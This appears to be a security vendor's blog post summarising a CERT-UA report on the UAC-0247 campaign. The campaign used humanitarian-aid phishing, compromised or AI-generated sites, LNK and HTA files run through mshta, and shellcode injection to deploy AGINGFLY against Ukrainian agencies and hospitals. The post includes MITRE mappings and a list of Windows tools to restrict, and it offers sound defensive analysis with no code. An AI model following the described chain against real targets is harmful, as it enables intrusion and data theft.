Follow 
Phishing remains one of the most effective tactics in the cybercriminal playbook, particularly when attackers exploit urgent humanitarian themes, trusted online resources, and legitimate system tools to increase victim engagement. Europol also notes that phishing continues to serve as a primary delivery vector for data-stealing malware. This pattern is clearly reflected in the latest activity tracked by CERT-UA, where threat actors used humanitarian-aid themed lures and multi-stage malware delivery to target Ukrainian organizations.
In a CERT-UA article, researchers described a UAC-0247 campaign targeting local self-government bodies, communal healthcare institutions, and likely representatives of Ukraine’s Defense Forces. The operation ultimately deployed AGINGFLY and related malicious tools, combining phishing, deceptive web delivery, and abuse of legitimate Windows utilities to establish access and support follow-on compromise.
CERT-UA’s latest reporting highlights another wave of phishing-driven intrusions targeting Ukraine’s civilian and potentially defense-adjacent sectors. In the campaign described in the article, attackers used humanitarian-aid themed emails to lure victims into opening malicious content that eventually deployed AGINGFLY, a malware family associated with remote access, credential theft, and follow-on post-compromise activity. The observed targets included local self-government bodies, communal healthcare institutions, including clinical and emergency hospitals, and likely individuals connected to FPV drone operations.
Sign up for the SOC Prime Platform to proactively defend your organization against UAC-0247 attacks. Just press Explore Detections below and access a relevant detection rule stack, enriched with AI-native CTI, mapped to the MITRE ATT&CK® framework, and compatible with a wide range of SIEM, EDR, and Data Lake technologies.
Security teams can search the Threat Detection Marketplace using the “UAC-0247” tag to identify relevant detections and monitor related content updates. Cyber defenders can also rely on Uncoder AI to convert raw threat intelligence into performance-optimized queries, document and improve rule logic, and generate Attack Flows based on the latest CERT-UA reporting.
Analyzing UAC-0247 Attacks Delivering AGINGFLY via Humanitarian-Themed Phishing Lures
According to CERT-UA, the attack chain began with phishing emails disguised as humanitarian aid proposals. Victims were prompted to click a link that redirected either to a legitimate website compromised through cross-site scripting (XSS) or to a fake website generated with AI tools. In both scenarios, the objective was to persuade the victim to download and open an archive containing a malicious LNK file.
Once launched, the shortcut file abused mshta.exe to retrieve and execute a remote HTA file. The HTA displayed a decoy form to distract the victim while simultaneously downloading an executable that injected shellcode into a legitimate process, such as RuntimeBroker.exe. CERT-UA also noted that more recent stages of the campaign relied on a two-stage loader, with the second stage using a proprietary executable format and the final payload additionally compressed and encrypted to complicate detection and analysis.
Among the next-stage components identified in the campaign were RAVENSHELL, which acted as a reverse-shell style stager, SILENTLOOP, a PowerShell-based tool capable of executing commands and obtaining command-and-control data, and AGINGFLY, the primary malware family used in the operation. CERT-UA-linked reporting indicates that AGINGFLY is designed for remote control, data theft, and follow-on compromise activity.
The campaign also supported credential theft, reconnaissance, and lateral movement. Investigators observed the use of tooling to extract data from Chromium-based browsers, access messaging-related data, scan internal networks, and tunnel traffic across compromised environments. In one of the investigated cases, forensic evidence suggested that representatives of Ukraine’s Defense Forces may have been targeted using malicious ZIP archives distributed via Signal and designed to deploy AGINGFLY through DLL side-loading.
To reduce exposure to this activity, CERT-UA recommends restricting the execution of risky file types such as LNK, HTA, and JS, while also limiting or closely monitoring the use of native Windows tools frequently abused in the infection chain, including mshta.exe, powershell.exe, and wscript.exe.
MITRE ATT&CK Context
Leveraging MITRE ATT&CK helps contextualize the latest UAC-0247 activity. Based on the reported TTPs, the most relevant techniques likely include Phishing: Spearphishing Link (T1566.002), Command and Scripting Interpreter, Process Injection (T1055), Web Protocols / WebSockets for C2, Credential Access, and Lateral Movement via tunneling and proxying tools. This mapping reflects the phishing lures, deceptive web delivery, LNK-to-HTA execution, shellcode injection, AGINGFLY deployment, and follow-on credential theft and internal reconnaissance.
